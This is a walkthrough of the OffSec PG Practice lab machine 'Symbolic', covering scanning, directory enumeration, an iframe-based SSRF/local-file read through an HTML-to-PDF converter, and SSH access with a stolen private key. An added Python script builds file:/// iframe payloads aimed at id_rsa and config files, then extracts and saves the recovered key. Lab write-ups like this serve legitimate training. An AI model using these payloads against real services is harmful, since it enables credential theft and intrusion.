Symbolic Walkthrough
Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)
1. Scanning
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 125 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:40:e2:ef:21:ea:c1:77:b6:14:a3:f7:04:59:45:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcjA6Du6Xclk6bj2jRxFnRpmqAaGYZBeR4bZ+ZlpEc3HQxgUVtevQcEwV/GkD1uHnkavTJLsV8xf0SxHOxvjlCTHVxCApToP7QQkXH+wNw9kMz8xhzI0fVxvTTWGcOskfxgTfw7AcvYsXmKbJnUwZRaNdr5GtdJqO9jW1WprImYTY7ZSxzfxomZiQj87g21nbY/QSPfeJXbmacl9U52B9KB6StxVCGrS0hL3PIfDbQvGYiDqfH1/0UrE8NsdC3cmf2yMHwrpUXiHv6aMwpOP4WHhsBZgqotqaj5clEq051IylC5RcRGVmPqG5m7Sb1F91L43RLVfp5gSDX/K097bOL
| 256 f8:fb:e3:c6:16:3a:e2:62:d0:e2:ae:d4:f2:9e:6f:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEsNFRln5wL+8mm70Jhj1dYrLiOfcB1bg1sJRbZu84TZhAuaZuab6L3L77D1Iz/o2guD9TyvRvcU3nRIxdvIUxw=
| 256 94:5e:97:ad:f9:0f:81:b6:6b:3b:bd:98:43:c0:0d:6a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPGpJEAiGfo+odXRYF/qTK3JeKYerp7y7Qn6wVd4pByr
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: WebPage to PDF
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
Enumeration
So we only have two ports open, and HTTP is always my primary concern.
Enumerating port 80 (HTTP)
Quickly going to the browser.

So we have a website that converts a URL into a PDF. Let's start enumerating the website.
└─$ gobuster dir --url $URL --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,aspx,html,pdf,conf,lua
Found some interesting URIs.

Browsing the found links manually, I see PDFs saved there; it is probably storing the PDFs it generates.

One of the PDFs contains a private key. Since we have no idea which user it belongs to, we'll save it and keep enumerating.

Exploitation
SSRF
I pointed the converter at a webshell.php file, but the website failed to render it. The site also states it is HTML2PDF, so I changed the extension to .html and uploaded it again, and this time it rendered the PHP code.

But we cannot execute any commands through the webshell.
I tried a lot of things, including PHP functions such as include and readfile, but they failed. After many tries I used an iframe src instead, and that worked for me.


Now we could continue our enumeration this way, but an interactive shell is ideal.
For that we will fetch the SSH key of the user p4yl0ad, assuming the username from the webpage.


I was able to fetch the SSH key, and it looks the same as the one found at the beginning of the enumeration. I could have used that one, but it's fine; now we'll use this key.
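Putting the iframe trick together, as an added example that is not part of the original writeup: a small Python helper that builds the HTML payload to host on the attacker box (the converter is then pointed at it through the site's own form) and recovers the PEM key from the text of the PDF the site returns, for instance pdftotext output. The key path C:/Users/p4yl0ad/.ssh/id_rsa and the other candidate paths are assumptions, and the PDF text in the block is constructed placeholder input, not the real key.

```python
"""Added example, not from the original writeup: build the iframe payload for the
HTML2PDF local-file read and recover a PEM private key from the text of the
returned PDF. Target paths are assumptions; SAMPLE_PDF_TEXT is constructed."""
import os
import re
import stat
from typing import Optional

# Files worth reading once the iframe trick works. These paths are assumed,
# not confirmed by the writeup.
CANDIDATE_FILES = [
    "C:/Users/p4yl0ad/.ssh/id_rsa",
    "C:/Windows/System32/drivers/etc/hosts",
    "C:/xampp/apache/conf/httpd.conf",
]


def build_iframe_payload(local_path: str, height: int = 2000) -> str:
    """HTML page to host on the attacker box. The converter renders the iframe
    and so embeds the target's local file in the PDF it produces. A tall iframe
    keeps a long file such as a private key from being clipped."""
    return (
        "<html><body>\n"
        f'<iframe src="file:///{local_path}" width="100%" height="{height}"></iframe>\n'
        "</body></html>\n"
    )


# Matches any PEM private-key block (RSA, EC, OPENSSH, or plain PRIVATE KEY).
PEM_RE = re.compile(
    r"-----BEGIN ([A-Z ]*PRIVATE KEY)-----(.*?)-----END \1-----", re.S
)


def extract_private_key(pdf_text: str) -> Optional[str]:
    """Find a PEM private key in text extracted from the PDF and reflow its body
    into 64-column lines, since the PDF text layer breaks lines arbitrarily and
    ssh rejects a mangled key. Returns None when no key is present."""
    m = PEM_RE.search(pdf_text)
    if not m:
        return None
    label, body = m.group(1), m.group(2)
    b64 = "".join(body.split())  # drop the newlines and spaces the PDF layer added
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


def save_key(key: str, path: str) -> None:
    """Write the key with mode 0600; ssh refuses a key readable by others."""
    with open(path, "w") as f:
        f.write(key)
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)


# Constructed sample of pdftotext-style output: page title and page number
# around the key, with the base64 body split at odd widths. The body is
# placeholder text, not a real key.
SAMPLE_PDF_TEXT = (
    "WebPage to PDF\n"
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    + "A" * 70 + "\n"
    + "B" * 70 + "\n"
    + "CCCC\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
    "Page 1\n"
)

if __name__ == "__main__":
    # Write one payload per candidate file; serve the directory with
    # `python3 -m http.server` and submit each URL to the converter.
    for i, target in enumerate(CANDIDATE_FILES):
        with open(f"payload{i}.html", "w") as f:
            f.write(build_iframe_payload(target))
    key = extract_private_key(SAMPLE_PDF_TEXT)
    if key:
        save_key(key, "id_rsa")
        print("key recovered; try: ssh -i id_rsa p4yl0ad@<target>")
```

Run pdftotext on the PDF the site returns and feed the text to extract_private_key; if the key comes back None, the iframe was likely clipped, so raise the height or read the file in a second payload.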
Initial Access
Using the key, we got access to the machine.
ssh -i id_rsa p4yl0ad@192.168.121.177
